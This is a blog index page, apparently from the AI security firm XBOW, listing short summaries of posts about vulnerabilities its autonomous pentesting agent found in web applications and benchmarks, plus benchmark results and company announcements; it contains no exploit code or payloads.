XBOW autonomously finds and exploits vulnerabilities in 75% of web benchmarks
Updates and opinions from the team
July 31, 2025 - By Nico Waisman
As much as an AI might get discouraged, it’s also incredibly relentless in its pursuit.
Read postJuly 28, 2025 - By Alvaro Muñoz
A complete arbitrary local file read vulnerability achieved through an ingenious byte-by-byte exfiltration technique.
Read postJuly 24, 2025 - By Alvaro Muñoz
A methodical analysis of TiTiler's API endpoints and its expression parser, leading to arbitrary Python code execution on the server.
Read postJuly 21, 2025 - By Nico Waisman
The XBOW bug bounty effort continues, and this time it uncovered a critical local file inclusion vulnerability by transforming an intriguing SSRF into a full file read exploit.
Read postJuly 17, 2025 - By Albert Ziegler
A simple, powerful innovation boosts performance in agentic AI systems.
Read postJuly 14, 2025 - By Alvaro Muñoz
Sharing the story of how XBOW sniffed out a sneaky arbitrary file read bug in the popular WordPress Ninja Tables plugin.
Read postJuly 10, 2025 - By Javier Gil
Summer's scorching heat is particularly brutal this season, making even the most seasoned pentesters dream of cool shade and refreshing drinks. But sometimes, when you're deep in the trenches of vulnerability research, you stumble upon something that's equally refreshing: a crisp, clean SQL injection vulnerability as good as an ice-cold beverage on a sweltering day.
Read postJuly 7, 2025 - By Diego Jurado
How artificial intelligence discovered a widespread XSS vulnerability through methodical testing and creative parameter combinations.
Read postJune 30, 2025 - By Diego Jurado
When XBOW met Akamai: a walkthrough of discovering and exploiting an XML External Entity vulnerability (CVE-2025-49493) in a widely-deployed application.
Read postJune 24, 2025 - By Nico Waisman
For the first time in bug bounty history, an autonomous penetration tester has reached the top spot on the US leaderboard.
Read postJune 24, 2025 - By Oege de Moor
XBOW has reached a critical milestone: our AI now rivals and surpasses top-tier human hackers.
Read postJune 24, 2025 - By Alvaro Muñoz
XBOW discovered multiple cross-site scripting (XSS) vulnerabilities in Palo Alto Networks’ GlobalProtect VPN web application
Read postDecember 20, 2024 - By Nico Waisman
XBOW discovered an arbitrary file download vulnerability on the WPS open source app Zoo-Project.
Read postDecember 13, 2024 - By Diego Jurado
XBOW discovered a Cross-Site Scripting (XSS) vulnerability in the open-source project, 2FAuth.
Read postDecember 2, 2024 - By Diego Jurado
XBOW discovered a Path Traversal vulnerability in the open-source project, LabsAI’s EDDI.
Read postNovember 22, 2024 - By Nico Waisman
XBOW discovered a Server-Side Request Forgery (SSRF) vulnerability in the OTP preview feature of the open-source project, 2FAuth.
Read postNovember 13, 2024 - By Nico Waisman and Brendan Dolan-Gavitt
As we shift our focus from benchmarks to real world applications, we will be sharing some of the most interesting vulnerabilities XBOW has found in real-world, open-source targets. The first of these is an authentication bypass in Scoold, a popular open-source Q&A platform.
Read postSeptember 11, 2024 - By Nico Waisman
XBOW is currently making 104 benchmarks available to the public. This allows other security products, tools, and researchers to use and explore these benchmarks.
Read postAugust 5, 2024 - By Oege de Moor
Five professional pentesters were asked to find and exploit the vulnerabilities in 104 realistic web security benchmarks. The most senior of them, with over twenty years of experience, solved 85% during 40 hours, while others scored 59% or less. XBOW also scored 85%, doing so in 28 minutes. This illustrates how XBOW can boost offensive security teams, freeing them to focus on the most interesting and challenging parts of their job.
Read postJuly 30, 2024 - By Oege de Moor
XBOW scales offensive security through AI, boosting the work of pentesters, bug hunters and offensive security researchers. It autonomously solves 75% of web app security benchmarks. Sequoia Capital is leading a $20M seed round in XBOW.
Read postJuly 17, 2024 - By Brendan Dolan-Gavitt
When I taught Offensive Security at NYU, padding oracles were the hardest attack we covered in our two-week unit on breaking cryptography. So it shocked me when XBOW managed to successfully build an exploit for this vulnerability in one of our novel benchmarks “Bad Captcha”, using it to decrypt a cookie set by the server and bypass its authentication.
Read postJuly 15, 2024 - By Oege de Moor
XBOW brings AI to offensive security. Today we’re announcing the results of testing XBOW on hundreds of web security benchmarks. Without any human intervention, XBOW correctly finds and exploits the vulnerabilities in most of them.
Read post